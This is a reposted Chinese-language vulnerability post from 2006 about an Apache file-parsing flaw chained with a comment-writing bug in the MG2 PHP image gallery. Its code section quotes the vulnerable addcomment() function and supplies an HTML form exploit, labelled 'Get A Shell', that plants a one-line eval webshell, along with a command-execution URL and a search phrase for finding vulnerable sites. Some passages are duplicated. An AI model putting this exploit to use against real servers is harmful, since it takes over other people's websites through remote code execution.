Apache最新安全漏洞与利用
Bug Find By Cooldiyer @ 2006/12/13 15:05
描述: 任意以.php开头的文件名,Apache都当做php文件解析
如".php.comment"将被当做php文件解析,由此引发一系列漏洞.
MG2是在国外非常流行的一个PHP+HTML的图片管理程序,由于商业版被破解,程序流传甚广,
在google搜索关键字为"Powered by MG2 v0.5.1"
最新版本存在着文件写入漏洞,可配和Apache漏洞直接得shell
includes/mg2_functions.php中addcomment()函数如下
function addcomment() {
$_REQUEST['filename'] = $this->charfix($_REQUEST['filename']);
$_REQUEST['input'] = $this->charfix($_REQUEST['input']);
$_REQUEST['email'] = $this->charfix($_REQUEST['email']);
$_REQUEST['name'] = $this->charfix($_REQUEST['name']);
$_REQUEST['input'] = strip_tags($_REQUEST['input'], "<b></b><i></i><u></u><strong></strong><em></em>");
$_REQUEST['input'] = str_replace("\n","<br />",$_REQUEST['input']);
$_REQUEST['input'] = str_replace("\r","",$_REQUEST['input']);
if ($_REQUEST['input'] != "" && $_REQUEST['name'] != "" && $_REQUEST['email'] != "") {
$this->readcomments("pictures/" . $_REQUEST['filename'] . ".comment");
$comment_exists = $this->select($_REQUEST['input'],$this->comments,3,1,0);
$comment_exists = $this->select($_REQUEST['name'],$comment_exists,1,1,0);
$comment_exists = $this->select($_REQUEST['email'],$comment_exists,2,1,0);
if (count($comment_exists) == 0) {
$this->comments[] = array(time(), $_REQUEST['name'], $_REQUEST['email'], $_REQUEST['input']);
$this->writecomments($_REQUEST['filename'] . ".comment");
........
$_REQUEST['filename'] = $this->charfix($_REQUEST['filename']);
$_REQUEST['input'] = $this->charfix($_REQUEST['input']);
$_REQUEST['email'] = $this->charfix($_REQUEST['email']);
$_REQUEST['name'] = $this->charfix($_REQUEST['name']);
$_REQUEST['input'] = strip_tags($_REQUEST['input'], "<b></b><i></i><u></u><strong></strong><em></em>");
$_REQUEST['input'] = str_replace("\n","<br />",$_REQUEST['input']);
$_REQUEST['input'] = str_replace("\r","",$_REQUEST['input']);
if ($_REQUEST['input'] != "" && $_REQUEST['name'] != "" && $_REQUEST['email'] != "") {
$this->readcomments("pictures/" . $_REQUEST['filename'] . ".comment");
$comment_exists = $this->select($_REQUEST['input'],$this->comments,3,1,0);
$comment_exists = $this->select($_REQUEST['name'],$comment_exists,1,1,0);
$comment_exists = $this->select($_REQUEST['email'],$comment_exists,2,1,0);
if (count($comment_exists) == 0) {
$this->comments[] = array(time(), $_REQUEST['name'], $_REQUEST['email'], $_REQUEST['input']);
$this->writecomments($_REQUEST['filename'] . ".comment");
........
漏洞很明显,可以自定义comment的文件名,如果你自定义的filename为".php",那么程序就会在
图片根目录下生成一个".php.comment"的文件,由于Apache的漏洞,该程序被当做php文件解析,webshell就到手了,
写了个利用程序如下:
图片根目录下生成一个".php.comment"的文件,由于Apache的漏洞,该程序被当做php文件解析,webshell就到手了,
写了个利用程序如下:
<form action="http://localhost/mg2/index.php" method="post">
<input type=hidden name="input" value="You Are Owned">
<input type=hidden name="email" value="abc@abc.com">
<input type=hidden name="filename" value=".php">
<input type="hidden" name="action" value="addcomment">
<textarea name="name" cols=30 rows=10>
<?eval($_REQUEST[cmd])?>
</textarea><br>
<input type="submit" value="Get A Shell">
</form>
<input type=hidden name="input" value="You Are Owned">
<input type=hidden name="email" value="abc@abc.com">
<input type=hidden name="filename" value=".php">
<input type="hidden" name="action" value="addcomment">
<textarea name="name" cols=30 rows=10>
<?eval($_REQUEST[cmd])?>
</textarea><br>
<input type="submit" value="Get A Shell">
</form>
提交后就会在图片根目录下生成一个含一句话木马的文件".php.comment"
http://localhost/mg2/pictures/.php.comment?cmd=phpinfo();
http://localhost/mg2/pictures/.php.comment?cmd=phpinfo();
转于红狼
